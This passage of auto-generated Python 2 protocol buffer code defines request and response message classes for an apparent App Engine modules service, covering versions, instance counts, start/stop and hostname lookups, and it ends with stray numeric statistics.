n = 0
n += 1 * len(self.version_)
for i in xrange(len(self.version_)): n += self.lengthString(len(self.version_[i]))
return n
def ByteSizePartial(self):
n = 0
n += 1 * len(self.version_)
for i in xrange(len(self.version_)): n += self.lengthString(len(self.version_[i]))
return n
def Clear(self):
self.clear_version()
def OutputUnchecked(self, out):
for i in xrange(len(self.version_)):
out.putVarInt32(10)
out.putPrefixedString(self.version_[i])
def OutputPartial(self, out):
for i in xrange(len(self.version_)):
out.putVarInt32(10)
out.putPrefixedString(self.version_[i])
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 10:
self.add_version(d.getPrefixedString())
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
cnt=0
for e in self.version_:
elm=""
if printElemNumber: elm="(%d)" % cnt
res+=prefix+("version%s: %s\n" % (elm, self.DebugFormatString(e)))
cnt+=1
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kversion = 1
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "version",
}, 1)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.STRING,
}, 1, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.GetVersionsResponse'
class GetDefaultVersionRequest(ProtocolBuffer.ProtocolMessage):
has_module_ = 0
module_ = ""
def __init__(self, contents=None):
if contents is not None: self.MergeFromString(contents)
def module(self): return self.module_
def set_module(self, x):
self.has_module_ = 1
self.module_ = x
def clear_module(self):
if self.has_module_:
self.has_module_ = 0
self.module_ = ""
def has_module(self): return self.has_module_
def MergeFrom(self, x):
assert x is not self
if (x.has_module()): self.set_module(x.module())
def Equals(self, x):
if x is self: return 1
if self.has_module_ != x.has_module_: return 0
if self.has_module_ and self.module_ != x.module_: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
return initialized
def ByteSize(self):
n = 0
if (self.has_module_): n += 1 + self.lengthString(len(self.module_))
return n
def ByteSizePartial(self):
n = 0
if (self.has_module_): n += 1 + self.lengthString(len(self.module_))
return n
def Clear(self):
self.clear_module()
def OutputUnchecked(self, out):
if (self.has_module_):
out.putVarInt32(10)
out.putPrefixedString(self.module_)
def OutputPartial(self, out):
if (self.has_module_):
out.putVarInt32(10)
out.putPrefixedString(self.module_)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 10:
self.set_module(d.getPrefixedString())
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
if self.has_module_: res+=prefix+("module: %s\n" % self.DebugFormatString(self.module_))
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kmodule = 1
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "module",
}, 1)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.STRING,
}, 1, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.GetDefaultVersionRequest'
class GetDefaultVersionResponse(ProtocolBuffer.ProtocolMessage):
has_version_ = 0
version_ = ""
def __init__(self, contents=None):
if contents is not None: self.MergeFromString(contents)
def version(self): return self.version_
def set_version(self, x):
self.has_version_ = 1
self.version_ = x
def clear_version(self):
if self.has_version_:
self.has_version_ = 0
self.version_ = ""
def has_version(self): return self.has_version_
def MergeFrom(self, x):
assert x is not self
if (x.has_version()): self.set_version(x.version())
def Equals(self, x):
if x is self: return 1
if self.has_version_ != x.has_version_: return 0
if self.has_version_ and self.version_ != x.version_: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
if (not self.has_version_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: version not set.')
return initialized
def ByteSize(self):
n = 0
n += self.lengthString(len(self.version_))
return n + 1
def ByteSizePartial(self):
n = 0
if (self.has_version_):
n += 1
n += self.lengthString(len(self.version_))
return n
def Clear(self):
self.clear_version()
def OutputUnchecked(self, out):
out.putVarInt32(10)
out.putPrefixedString(self.version_)
def OutputPartial(self, out):
if (self.has_version_):
out.putVarInt32(10)
out.putPrefixedString(self.version_)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 10:
self.set_version(d.getPrefixedString())
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
if self.has_version_: res+=prefix+("version: %s\n" % self.DebugFormatString(self.version_))
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kversion = 1
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "version",
}, 1)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.STRING,
}, 1, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.GetDefaultVersionResponse'
class GetNumInstancesRequest(ProtocolBuffer.ProtocolMessage):
has_module_ = 0
module_ = ""
has_version_ = 0
version_ = ""
def __init__(self, contents=None):
if contents is not None: self.MergeFromString(contents)
def module(self): return self.module_
def set_module(self, x):
self.has_module_ = 1
self.module_ = x
def clear_module(self):
if self.has_module_:
self.has_module_ = 0
self.module_ = ""
def has_module(self): return self.has_module_
def version(self): return self.version_
def set_version(self, x):
self.has_version_ = 1
self.version_ = x
def clear_version(self):
if self.has_version_:
self.has_version_ = 0
self.version_ = ""
def has_version(self): return self.has_version_
def MergeFrom(self, x):
assert x is not self
if (x.has_module()): self.set_module(x.module())
if (x.has_version()): self.set_version(x.version())
def Equals(self, x):
if x is self: return 1
if self.has_module_ != x.has_module_: return 0
if self.has_module_ and self.module_ != x.module_: return 0
if self.has_version_ != x.has_version_: return 0
if self.has_version_ and self.version_ != x.version_: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
return initialized
def ByteSize(self):
n = 0
if (self.has_module_): n += 1 + self.lengthString(len(self.module_))
if (self.has_version_): n += 1 + self.lengthString(len(self.version_))
return n
def ByteSizePartial(self):
n = 0
if (self.has_module_): n += 1 + self.lengthString(len(self.module_))
if (self.has_version_): n += 1 + self.lengthString(len(self.version_))
return n
def Clear(self):
self.clear_module()
self.clear_version()
def OutputUnchecked(self, out):
if (self.has_module_):
out.putVarInt32(10)
out.putPrefixedString(self.module_)
if (self.has_version_):
out.putVarInt32(18)
out.putPrefixedString(self.version_)
def OutputPartial(self, out):
if (self.has_module_):
out.putVarInt32(10)
out.putPrefixedString(self.module_)
if (self.has_version_):
out.putVarInt32(18)
out.putPrefixedString(self.version_)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 10:
self.set_module(d.getPrefixedString())
continue
if tt == 18:
self.set_version(d.getPrefixedString())
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
if self.has_module_: res+=prefix+("module: %s\n" % self.DebugFormatString(self.module_))
if self.has_version_: res+=prefix+("version: %s\n" % self.DebugFormatString(self.version_))
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kmodule = 1
kversion = 2
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "module",
2: "version",
}, 2)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.STRING,
2: ProtocolBuffer.Encoder.STRING,
}, 2, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.GetNumInstancesRequest'
class GetNumInstancesResponse(ProtocolBuffer.ProtocolMessage):
has_instances_ = 0
instances_ = 0
def __init__(self, contents=None):
if contents is not None: self.MergeFromString(contents)
def instances(self): return self.instances_
def set_instances(self, x):
self.has_instances_ = 1
self.instances_ = x
def clear_instances(self):
if self.has_instances_:
self.has_instances_ = 0
self.instances_ = 0
def has_instances(self): return self.has_instances_
def MergeFrom(self, x):
assert x is not self
if (x.has_instances()): self.set_instances(x.instances())
def Equals(self, x):
if x is self: return 1
if self.has_instances_ != x.has_instances_: return 0
if self.has_instances_ and self.instances_ != x.instances_: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
if (not self.has_instances_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: instances not set.')
return initialized
def ByteSize(self):
n = 0
n += self.lengthVarInt64(self.instances_)
return n + 1
def ByteSizePartial(self):
n = 0
if (self.has_instances_):
n += 1
n += self.lengthVarInt64(self.instances_)
return n
def Clear(self):
self.clear_instances()
def OutputUnchecked(self, out):
out.putVarInt32(8)
out.putVarInt64(self.instances_)
def OutputPartial(self, out):
if (self.has_instances_):
out.putVarInt32(8)
out.putVarInt64(self.instances_)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 8:
self.set_instances(d.getVarInt64())
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
if self.has_instances_: res+=prefix+("instances: %s\n" % self.DebugFormatInt64(self.instances_))
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kinstances = 1
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "instances",
}, 1)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.NUMERIC,
}, 1, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.GetNumInstancesResponse'
class SetNumInstancesRequest(ProtocolBuffer.ProtocolMessage):
has_module_ = 0
module_ = ""
has_version_ = 0
version_ = ""
has_instances_ = 0
instances_ = 0
def __init__(self, contents=None):
if contents is not None: self.MergeFromString(contents)
def module(self): return self.module_
def set_module(self, x):
self.has_module_ = 1
self.module_ = x
def clear_module(self):
if self.has_module_:
self.has_module_ = 0
self.module_ = ""
def has_module(self): return self.has_module_
def version(self): return self.version_
def set_version(self, x):
self.has_version_ = 1
self.version_ = x
def clear_version(self):
if self.has_version_:
self.has_version_ = 0
self.version_ = ""
def has_version(self): return self.has_version_
def instances(self): return self.instances_
def set_instances(self, x):
self.has_instances_ = 1
self.instances_ = x
def clear_instances(self):
if self.has_instances_:
self.has_instances_ = 0
self.instances_ = 0
def has_instances(self): return self.has_instances_
def MergeFrom(self, x):
assert x is not self
if (x.has_module()): self.set_module(x.module())
if (x.has_version()): self.set_version(x.version())
if (x.has_instances()): self.set_instances(x.instances())
def Equals(self, x):
if x is self: return 1
if self.has_module_ != x.has_module_: return 0
if self.has_module_ and self.module_ != x.module_: return 0
if self.has_version_ != x.has_version_: return 0
if self.has_version_ and self.version_ != x.version_: return 0
if self.has_instances_ != x.has_instances_: return 0
if self.has_instances_ and self.instances_ != x.instances_: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
if (not self.has_instances_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: instances not set.')
return initialized
def ByteSize(self):
n = 0
if (self.has_module_): n += 1 + self.lengthString(len(self.module_))
if (self.has_version_): n += 1 + self.lengthString(len(self.version_))
n += self.lengthVarInt64(self.instances_)
return n + 1
def ByteSizePartial(self):
n = 0
if (self.has_module_): n += 1 + self.lengthString(len(self.module_))
if (self.has_version_): n += 1 + self.lengthString(len(self.version_))
if (self.has_instances_):
n += 1
n += self.lengthVarInt64(self.instances_)
return n
def Clear(self):
self.clear_module()
self.clear_version()
self.clear_instances()
def OutputUnchecked(self, out):
if (self.has_module_):
out.putVarInt32(10)
out.putPrefixedString(self.module_)
if (self.has_version_):
out.putVarInt32(18)
out.putPrefixedString(self.version_)
out.putVarInt32(24)
out.putVarInt64(self.instances_)
def OutputPartial(self, out):
if (self.has_module_):
out.putVarInt32(10)
out.putPrefixedString(self.module_)
if (self.has_version_):
out.putVarInt32(18)
out.putPrefixedString(self.version_)
if (self.has_instances_):
out.putVarInt32(24)
out.putVarInt64(self.instances_)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 10:
self.set_module(d.getPrefixedString())
continue
if tt == 18:
self.set_version(d.getPrefixedString())
continue
if tt == 24:
self.set_instances(d.getVarInt64())
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
if self.has_module_: res+=prefix+("module: %s\n" % self.DebugFormatString(self.module_))
if self.has_version_: res+=prefix+("version: %s\n" % self.DebugFormatString(self.version_))
if self.has_instances_: res+=prefix+("instances: %s\n" % self.DebugFormatInt64(self.instances_))
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kmodule = 1
kversion = 2
kinstances = 3
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "module",
2: "version",
3: "instances",
}, 3)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.STRING,
2: ProtocolBuffer.Encoder.STRING,
3: ProtocolBuffer.Encoder.NUMERIC,
}, 3, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.SetNumInstancesRequest'
class SetNumInstancesResponse(ProtocolBuffer.ProtocolMessage):
def __init__(self, contents=None):
pass
if contents is not None: self.MergeFromString(contents)
def MergeFrom(self, x):
assert x is not self
def Equals(self, x):
if x is self: return 1
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
return initialized
def ByteSize(self):
n = 0
return n
def ByteSizePartial(self):
n = 0
return n
def Clear(self):
pass
def OutputUnchecked(self, out):
pass
def OutputPartial(self, out):
pass
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
}, 0)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
}, 0, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.SetNumInstancesResponse'
class StartModuleRequest(ProtocolBuffer.ProtocolMessage):
has_module_ = 0
module_ = ""
has_version_ = 0
version_ = ""
def __init__(self, contents=None):
if contents is not None: self.MergeFromString(contents)
def module(self): return self.module_
def set_module(self, x):
self.has_module_ = 1
self.module_ = x
def clear_module(self):
if self.has_module_:
self.has_module_ = 0
self.module_ = ""
def has_module(self): return self.has_module_
def version(self): return self.version_
def set_version(self, x):
self.has_version_ = 1
self.version_ = x
def clear_version(self):
if self.has_version_:
self.has_version_ = 0
self.version_ = ""
def has_version(self): return self.has_version_
def MergeFrom(self, x):
assert x is not self
if (x.has_module()): self.set_module(x.module())
if (x.has_version()): self.set_version(x.version())
def Equals(self, x):
if x is self: return 1
if self.has_module_ != x.has_module_: return 0
if self.has_module_ and self.module_ != x.module_: return 0
if self.has_version_ != x.has_version_: return 0
if self.has_version_ and self.version_ != x.version_: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
if (not self.has_module_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: module not set.')
if (not self.has_version_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: version not set.')
return initialized
def ByteSize(self):
n = 0
n += self.lengthString(len(self.module_))
n += self.lengthString(len(self.version_))
return n + 2
def ByteSizePartial(self):
n = 0
if (self.has_module_):
n += 1
n += self.lengthString(len(self.module_))
if (self.has_version_):
n += 1
n += self.lengthString(len(self.version_))
return n
def Clear(self):
self.clear_module()
self.clear_version()
def OutputUnchecked(self, out):
out.putVarInt32(10)
out.putPrefixedString(self.module_)
out.putVarInt32(18)
out.putPrefixedString(self.version_)
def OutputPartial(self, out):
if (self.has_module_):
out.putVarInt32(10)
out.putPrefixedString(self.module_)
if (self.has_version_):
out.putVarInt32(18)
out.putPrefixedString(self.version_)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 10:
self.set_module(d.getPrefixedString())
continue
if tt == 18:
self.set_version(d.getPrefixedString())
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
if self.has_module_: res+=prefix+("module: %s\n" % self.DebugFormatString(self.module_))
if self.has_version_: res+=prefix+("version: %s\n" % self.DebugFormatString(self.version_))
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kmodule = 1
kversion = 2
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "module",
2: "version",
}, 2)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.STRING,
2: ProtocolBuffer.Encoder.STRING,
}, 2, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.StartModuleRequest'
class StartModuleResponse(ProtocolBuffer.ProtocolMessage):
def __init__(self, contents=None):
pass
if contents is not None: self.MergeFromString(contents)
def MergeFrom(self, x):
assert x is not self
def Equals(self, x):
if x is self: return 1
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
return initialized
def ByteSize(self):
n = 0
return n
def ByteSizePartial(self):
n = 0
return n
def Clear(self):
pass
def OutputUnchecked(self, out):
pass
def OutputPartial(self, out):
pass
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
}, 0)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
}, 0, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.StartModuleResponse'
class StopModuleRequest(ProtocolBuffer.ProtocolMessage):
has_module_ = 0
module_ = ""
has_version_ = 0
version_ = ""
def __init__(self, contents=None):
if contents is not None: self.MergeFromString(contents)
def module(self): return self.module_
def set_module(self, x):
self.has_module_ = 1
self.module_ = x
def clear_module(self):
if self.has_module_:
self.has_module_ = 0
self.module_ = ""
def has_module(self): return self.has_module_
def version(self): return self.version_
def set_version(self, x):
self.has_version_ = 1
self.version_ = x
def clear_version(self):
if self.has_version_:
self.has_version_ = 0
self.version_ = ""
def has_version(self): return self.has_version_
def MergeFrom(self, x):
assert x is not self
if (x.has_module()): self.set_module(x.module())
if (x.has_version()): self.set_version(x.version())
def Equals(self, x):
if x is self: return 1
if self.has_module_ != x.has_module_: return 0
if self.has_module_ and self.module_ != x.module_: return 0
if self.has_version_ != x.has_version_: return 0
if self.has_version_ and self.version_ != x.version_: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
return initialized
def ByteSize(self):
n = 0
if (self.has_module_): n += 1 + self.lengthString(len(self.module_))
if (self.has_version_): n += 1 + self.lengthString(len(self.version_))
return n
def ByteSizePartial(self):
n = 0
if (self.has_module_): n += 1 + self.lengthString(len(self.module_))
if (self.has_version_): n += 1 + self.lengthString(len(self.version_))
return n
def Clear(self):
self.clear_module()
self.clear_version()
def OutputUnchecked(self, out):
if (self.has_module_):
out.putVarInt32(10)
out.putPrefixedString(self.module_)
if (self.has_version_):
out.putVarInt32(18)
out.putPrefixedString(self.version_)
def OutputPartial(self, out):
if (self.has_module_):
out.putVarInt32(10)
out.putPrefixedString(self.module_)
if (self.has_version_):
out.putVarInt32(18)
out.putPrefixedString(self.version_)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 10:
self.set_module(d.getPrefixedString())
continue
if tt == 18:
self.set_version(d.getPrefixedString())
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
if self.has_module_: res+=prefix+("module: %s\n" % self.DebugFormatString(self.module_))
if self.has_version_: res+=prefix+("version: %s\n" % self.DebugFormatString(self.version_))
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kmodule = 1
kversion = 2
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "module",
2: "version",
}, 2)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.STRING,
2: ProtocolBuffer.Encoder.STRING,
}, 2, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.StopModuleRequest'
class StopModuleResponse(ProtocolBuffer.ProtocolMessage):
def __init__(self, contents=None):
pass
if contents is not None: self.MergeFromString(contents)
def MergeFrom(self, x):
assert x is not self
def Equals(self, x):
if x is self: return 1
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
return initialized
def ByteSize(self):
n = 0
return n
def ByteSizePartial(self):
n = 0
return n
def Clear(self):
pass
def OutputUnchecked(self, out):
pass
def OutputPartial(self, out):
pass
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
}, 0)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
}, 0, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.StopModuleResponse'
class GetHostnameRequest(ProtocolBuffer.ProtocolMessage):
has_module_ = 0
module_ = ""
has_version_ = 0
version_ = ""
has_instance_ = 0
instance_ = ""
def __init__(self, contents=None):
if contents is not None: self.MergeFromString(contents)
def module(self): return self.module_
def set_module(self, x):
self.has_module_ = 1
self.module_ = x
def clear_module(self):
if self.has_module_:
self.has_module_ = 0
self.module_ = ""
def has_module(self): return self.has_module_
def version(self): return self.version_
def set_version(self, x):
self.has_version_ = 1
self.version_ = x
def clear_version(self):
if self.has_version_:
self.has_version_ = 0
self.version_ = ""
def has_version(self): return self.has_version_
def instance(self): return self.instance_
def set_instance(self, x):
self.has_instance_ = 1
self.instance_ = x
def clear_instance(self):
if self.has_instance_:
self.has_instance_ = 0
self.instance_ = ""
def has_instance(self): return self.has_instance_
def MergeFrom(self, x):
assert x is not self
if (x.has_module()): self.set_module(x.module())
if (x.has_version()): self.set_version(x.version())
if (x.has_instance()): self.set_instance(x.instance())
def Equals(self, x):
if x is self: return 1
if self.has_module_ != x.has_module_: return 0
if self.has_module_ and self.module_ != x.module_: return 0
if self.has_version_ != x.has_version_: return 0
if self.has_version_ and self.version_ != x.version_: return 0
if self.has_instance_ != x.has_instance_: return 0
if self.has_instance_ and self.instance_ != x.instance_: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
return initialized
def ByteSize(self):
n = 0
if (self.has_module_): n += 1 + self.lengthString(len(self.module_))
if (self.has_version_): n += 1 + self.lengthString(len(self.version_))
if (self.has_instance_): n += 1 + self.lengthString(len(self.instance_))
return n
def ByteSizePartial(self):
n = 0
if (self.has_module_): n += 1 + self.lengthString(len(self.module_))
if (self.has_version_): n += 1 + self.lengthString(len(self.version_))
if (self.has_instance_): n += 1 + self.lengthString(len(self.instance_))
return n
def Clear(self):
self.clear_module()
self.clear_version()
self.clear_instance()
def OutputUnchecked(self, out):
if (self.has_module_):
out.putVarInt32(10)
out.putPrefixedString(self.module_)
if (self.has_version_):
out.putVarInt32(18)
out.putPrefixedString(self.version_)
if (self.has_instance_):
out.putVarInt32(26)
out.putPrefixedString(self.instance_)
def OutputPartial(self, out):
if (self.has_module_):
out.putVarInt32(10)
out.putPrefixedString(self.module_)
if (self.has_version_):
out.putVarInt32(18)
out.putPrefixedString(self.version_)
if (self.has_instance_):
out.putVarInt32(26)
out.putPrefixedString(self.instance_)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 10:
self.set_module(d.getPrefixedString())
continue
if tt == 18:
self.set_version(d.getPrefixedString())
continue
if tt == 26:
self.set_instance(d.getPrefixedString())
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
if self.has_module_: res+=prefix+("module: %s\n" % self.DebugFormatString(self.module_))
if self.has_version_: res+=prefix+("version: %s\n" % self.DebugFormatString(self.version_))
if self.has_instance_: res+=prefix+("instance: %s\n" % self.DebugFormatString(self.instance_))
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kmodule = 1
kversion = 2
kinstance = 3
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "module",
2: "version",
3: "instance",
}, 3)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.STRING,
2: ProtocolBuffer.Encoder.STRING,
3: ProtocolBuffer.Encoder.STRING,
}, 3, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.GetHostnameRequest'
class GetHostnameResponse(ProtocolBuffer.ProtocolMessage):
has_hostname_ = 0
hostname_ = ""
def __init__(self, contents=None):
if contents is not None: self.MergeFromString(contents)
def hostname(self): return self.hostname_
def set_hostname(self, x):
self.has_hostname_ = 1
self.hostname_ = x
def clear_hostname(self):
if self.has_hostname_:
self.has_hostname_ = 0
self.hostname_ = ""
def has_hostname(self): return self.has_hostname_
def MergeFrom(self, x):
assert x is not self
if (x.has_hostname()): self.set_hostname(x.hostname())
def Equals(self, x):
if x is self: return 1
if self.has_hostname_ != x.has_hostname_: return 0
if self.has_hostname_ and self.hostname_ != x.hostname_: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
if (not self.has_hostname_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: hostname not set.')
return initialized
def ByteSize(self):
n = 0
n += self.lengthString(len(self.hostname_))
return n + 1
def ByteSizePartial(self):
n = 0
if (self.has_hostname_):
n += 1
n += self.lengthString(len(self.hostname_))
return n
def Clear(self):
self.clear_hostname()
def OutputUnchecked(self, out):
out.putVarInt32(10)
out.putPrefixedString(self.hostname_)
def OutputPartial(self, out):
if (self.has_hostname_):
out.putVarInt32(10)
out.putPrefixedString(self.hostname_)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 10:
self.set_hostname(d.getPrefixedString())
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
if self.has_hostname_: res+=prefix+("hostname: %s\n" % self.DebugFormatString(self.hostname_))
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
khostname = 1
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "hostname",
}, 1)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.STRING,
}, 1, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.GetHostnameResponse'
if _extension_runtime:
pass
__all__ = ['ModulesServiceError','GetModulesRequest','GetModulesResponse','GetVersionsRequest','GetVersionsResponse','GetDefaultVersionRequest','GetDefaultVersionResponse','GetNumInstancesRequest','GetNumInstancesResponse','SetNumInstancesRequest','SetNumInstancesResponse','StartModuleRequest','StartModuleResponse','StopModuleRequest','StopModuleResponse','GetHostnameRequest','GetHostnameResponse']
| 24.839779
| 401
| 0.66964
| 5,744
| 44,960
| 5.029248
| 0.038127
| 0.043859
| 0.038632
| 0.028039
| 0.87905
| 0.871642
| 0.866761
| 0.86323
| 0.846891
| 0.846891
| 0
| 0.020017
| 0.211077
| 44,960
| 1,809
| 402
| 24.85351
| 0.794418
